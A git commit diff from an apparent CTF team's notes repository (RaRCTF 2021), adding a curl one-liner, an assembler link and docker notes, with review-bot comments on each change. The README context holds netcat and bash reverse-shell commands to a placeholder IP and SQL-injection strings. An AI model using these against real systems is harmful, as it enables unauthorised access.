author    Malfurious <m@lfurio.us>  2021-08-15 06:18:40 -0400
committer Malfurious <m@lfurio.us>  2021-08-15 06:18:40 -0400
commit    5c205cf171804bb6ebc7b85c3839ca135e816bba (patch)
tree      710c6351af2daa8447a1d8c44f13874b296864e0
parent    b9b94713fc64b0b9443c3114c0c79d641db20a67 (diff)
Commit notes from RaRCTF 2021
Signed-off-by: Malfurious <m@lfurio.us>
Diffstat (limited to '')
-rw-r--r-- README.txt             | 1
-rw-r--r-- docs/pwn/pwn-links.txt | 1
-rw-r--r-- docs/web/docker.txt    | 15
3 files changed, 17 insertions, 0 deletions
diff --git a/README.txt b/README.txt
index 970854f..6dcf1b6 100644
--- a/README.txt
+++ b/README.txt
@@ -22,3 +22,4 @@ nc 10.0.0.1 1234 -e cmd.exe # Netcat reverse shell (Windows)
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 # Bash reverse shell
' OR 1=1-- # SQL inject (pass)
' OR 1=1 UNION SELECT x,y,z FROM table-- # SQL inject (leak)
+curl -i -X POST -d 'a=b&c=d' -F 'f=@file;filename=asdf' URL # curl post request
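Review bot: the added curl one-liner mixes `-d 'a=b&c=d'` with `-F 'f=@file;filename=asdf'`, and curl refuses that combination (it reports that only one HTTP request method can be selected, urlencoded POST via `-d` or multipart formpost via `-F`), so the line as written does not send a request. Pick one encoding: all multipart fields, `curl -i -F 'a=b' -F 'c=d' -F 'f=@file;filename=asdf' URL`, or a urlencoded body, `curl -i -d 'a=b&c=d' URL`. `-X POST` is redundant in either form, since both `-d` and `-F` already select POST.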
diff --git a/docs/pwn/pwn-links.txt b/docs/pwn/pwn-links.txt
index ae39752..5c8e374 100644
--- a/docs/pwn/pwn-links.txt
+++ b/docs/pwn/pwn-links.txt
@@ -1,3 +1,4 @@
https://opensource.com/article/21/6/linux-checksec
https://trustfoundry.net/basic-rop-techniques-and-tricks/
https://www.exploit-db.com/docs/english/28479-return-oriented-programming-(rop-ftw).pdf
+https://defuse.ca/online-x86-assembler.htm
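Review bot: the new entry, like the three above it, carries no note on what it is for, while README.txt in this same commit pairs every one-liner with a trailing `# ...` comment; the same convention would help here, e.g. `https://defuse.ca/online-x86-assembler.htm # assemble/disassemble x86 snippets in the browser`. Worth a word in that note as well: anything pasted into that page goes to a third-party server, so for material that should stay local, nasm plus objdump cover the same assemble/disassemble need offline.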
diff --git a/docs/web/docker.txt b/docs/web/docker.txt
new file mode 100644
index 0000000..992b5b3
--- /dev/null
+++ b/docs/web/docker.txt
@@ -0,0 +1,15 @@
+# TODO: This whole doc
+
+docker run -p host:container
+ Run container with port forwarding
+
+docker run --rm -d --network host --name <something> <image-id>
+ --rm Destroy container on exit
+ -d Run detached (don't hijack terminal)
+ --net... Use host's network (don't need port forward)
+
+docker exec -it
+ Get a shell in container
+
+
+I'm told docker-compose is just much simpler, try to use if possible.
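Review bot: `docker exec -it` is not a complete command; it needs the container and the program to run, e.g. `docker exec -it <something> /bin/sh`, where `<something>` is the value given to `--name` on the `docker run` line above. The `--net...` explanation should also record the trade-off: `--network host` puts the container in the host's network namespace, so it shares every host interface and port and loses the isolation that `-p` keeps, which is why `-p host:container` is the better default unless host networking is actually required. For consistency with the `<something> <image-id>` placeholders, the first line would read more clearly as `docker run -p <host-port>:<container-port>`.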